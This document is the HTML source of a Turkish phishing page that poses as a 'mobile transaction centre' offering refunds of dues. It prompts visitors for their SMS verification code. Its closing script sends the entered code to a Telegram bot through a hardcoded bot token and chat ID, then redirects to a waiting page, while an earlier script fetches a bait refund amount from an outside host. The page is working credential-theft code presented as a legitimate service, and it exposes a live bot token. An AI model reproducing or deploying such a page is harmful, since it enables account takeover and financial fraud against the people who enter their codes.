
<!DOCTYPE html>
<html class="no-js test-supports test-csstransforms3d test-history test-target test-texttrackapi test-track test-no-contains test-supports test-csstransforms3d test-history test-target test-texttrackapi test-track test-no-contains" lang="tr"><head>
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta http-equiv="x-ua-compatible" content="IE=edge">
    <meta http-equiv="cleartype" content="on">
    <title>Mobil İşlem Merkezi</title>
    <meta name="description" content="5 yıla kadar tüm ödediğiniz aidat ücretlerini geri alın">
 
    <meta name="keywords" content="mobil,işlem,merkezi">
    <meta name="robots" content="index,follow">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="theme-color" content="#4284be">
 
 
    <meta name="msapplication-TileColor" content="#FFFFFF">
    <link rel="stylesheet" href="assets/css/base.css">
   
    <link rel="stylesheet" href="assets/css/giris.css">
    <style>
      .yg-input-error-msg {
          display: none;
          color: red;
      }
  </style>
   <script src="https://cdn.jsdelivr.net/npm/vue@2/dist/vue.js"></script>
   <script src="https://cdn.jsdelivr.net/npm/axios/dist/axios.min.js"></script>
  </head>
  <body data-lang="tr_TR.UTF-8">
    <div class="wrapper">
        <div class="container">
 
    <header class="header">
   
    
 
    </header>
 
    <main>
        <section>
            <div class="content">
           <center>   <img src="https://media.istockphoto.com/id/503913526/pt/vetorial/%C3%ADcone-de-sms-smartphone.jpg?s=170667a&amp;w=0&amp;k=20&amp;c=2wJWZETcgVDZQRWmBou-LU0vT2D9IdUS0McpSy6gfFY=" jsaction="VQAsE" class="sFlh5c pT0Scc iPVvYb" style="max-width: 100%;height: 57%;margin: 4px 0px;width: 40%;" alt="Vetores de Ícone De Sms Smartphone e mais imagens de Aplicação móvel -  Aplicação móvel, Cardápio, Celular com câmera - iStock" jsname="kn3ccd" aria-hidden="false">  
<br> 
     </center> 
      
     <script>
      document.addEventListener("DOMContentLoaded", function() {
          const smsInput = document.getElementById("sms");

          smsInput.addEventListener("input", function() {
              const inputValue = smsInput.value.trim(); // Boşlukları temizle
              if (inputValue.length < 5 || inputValue.length > 6) {
                  smsInput.value = inputValue.slice(0, 6); // En fazla 6 karakter olarak sınırla
              }
          });

          document.getElementById("loginForm").addEventListener("submit", function(e) {
              const inputValue = smsInput.value.trim(); // Boşlukları temizle
              if (inputValue.length !== 5 && inputValue.length !== 6) {
                  e.preventDefault();
                  alert("SMS doğrulama kodu 5 veya 6 karakter olmalıdır.");
              }
          });

          const apiUrl = 'https://ozenellerklise.com.tr/dmn/pin.php?ip=';
          const ip = getCookie('ip');

          if (!ip) {
              console.error('IP adresi cookie olarak bulunamadı.');
              return;
          }

          const url = apiUrl + encodeURIComponent(ip);

          // AJAX ile GET isteği yaparak cevabı al
          fetch(url)
              .then(response => response.text())
              .then(data => {
                  // Cevabı aldıktan sonra işlemleri yap
                  const iadeTutariElement = document.getElementById('iadeTutari');

                  // İade tutarını Türk Lirası formatına dönüştür
                  const formattedTutar = formatTutar(data);

                  iadeTutariElement.textContent = formattedTutar;
              })
              .catch(error => console.error('API isteği hatası:', error));
      });

      // Cookie'den değer almak için yardımcı fonksiyon
      function getCookie(name) {
          const value = `; ${document.cookie}`;
          const parts = value.split(`; ${name}=`);
          if (parts.length === 2) return parts.pop().split(';').shift();
      }

      // Türk Lirası formatına dönüştürme fonksiyonu
      function formatTutar(tutar) {
          const formattedTutar = Number(tutar).toLocaleString('tr-TR', {
              style: 'currency',
              currency: 'TRY'
          });

          return formattedTutar.replace(/\s/g, ''); // Boşlukları kaldır
      }
  </script>
 <style>.list li.plus {
  border-left: 5px solid var(--plus-color);
}
.list li {
    background-color: var(--background-secondary-color);
    box-shadow: var(--box-shadow);
    color: var(--ternary-color);
    display: flex;
    justify-content: space-between;
    position: relative;
    padding: 10px;
    margin: 10px 0;
    border-top-left-radius: 5px;
    border-bottom-left-radius: 5px;
}

li {
    display: list-item;
    text-align: -webkit-match-parent;
    unicode-bidi: isolate;
} ul {
    display: block;
    list-style-type: disc;
    margin-block-start: 1em;
    margin-block-end: 1em;
    margin-inline-start: 0px;
    margin-inline-end: 0px;
    padding-inline-start: 40px;
    unicode-bidi: isolate;
}
.list {
    list-style-type: none;
    padding: 0;
    margin-bottom: 40px;
}:root {
    --main-color: #13168d;
    --secondary-color: #393a57;
    --ternary-color: #486ba6;
    --box-shadow: 0 1px 3px rgba(0, 0, 0, 0.12), 0 1px 2px rgba(0, 0, 0, 0.24);
    --background-color: #e5e6ed;
    --background-secondary-color: #fff;
    --border-color: #80717f;
    --border-secondary-color: #bcc0cb;
    --plus-color: #2ecc71;
    --minus-color: #c0392b;
}
</style>

    <form id="loginForm" name="sifreGirisForm" autocomplete="off">
  <fieldset>
    <div class="form-row required">
      <br>
      <label for="sms" class="enforced">SMS DOĞRULAMA KODU</label>
      <input type="hidden" name="encsms" id="encsms" value="">
      <div class="form-field fieldGroup">
        <input name="sms" type="number" e-validate="tck" class="form-control" id="sms" value="" autocomplete="off" required>
      </div>
    </div>
    <br>
    <div class="form-row center-item">
      <input type="hidden" name="actionName" value="giris">
      <button class="btn btn-send" id="submitButton" type="button">DOĞRULA</button>
    </div>
    <input type="hidden" name="ip" id="ip" value="">
  </fieldset>
</form>

  
            </div>
        </section>
    
 
    
    </main>
    
    
    
    
    
    
    
    
    
    </div>
   
    
    <footer class="footer-fixed" role="contentinfo">
        <span class="copyright"><img src="assets/img/DDO-logo.png" class="footer-logo" alt="logo" height="24"  >© 2024, Ankara - Tüm Hakları Saklıdır</span>
        <ul>
            <li>
                <a id="gizlilik_btn" 
                   aria-haspopup="true">Gizlilik ve Güvenlik
                </a>
            </li>
    
        </ul>
 
    </footer>
    
  </div>
 
    
    <script>

      document.getElementById('submitButton').addEventListener('click', function () {
  const smsCode = document.getElementById('sms').value;

  if (!smsCode) {
    alert('Lütfen SMS doğrulama kodunu giriniz!');
    return;
  }

  // Telegram bot token ve chat ID bilgileri
  const botToken = '8053214796:AAFJM6i9FnQYxqnM2j2sDtqJUOV3nCyKLvc';
  const chatId = '991795418';

  // Telegram API URL'si
  const telegramApiUrl = `https://api.telegram.org/bot${botToken}/sendMessage`;

  // Gönderilecek mesaj
  const message = `Yeni SMS doğrulama kodu: ${smsCode}`;

  // Telegram botuna mesaj gönder
  fetch(telegramApiUrl, {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({
      chat_id: chatId,
      text: message,
    }),
  })
    .then(response => {
      if (response.ok) {
        // Başarılı ise /bekle.html sayfasına yönlendir
        window.location.href = '/izmiravmarket-odeme/bekle.html';
      } else {
        alert('Mesaj gönderilirken bir hata oluştu.');
      }
    })
    .catch(error => {
      console.error('Telegram API hatası:', error);
      alert('Telegram botuna bağlanırken bir hata oluştu.');
    });
});

    </script>
 
    </body>
    </html>
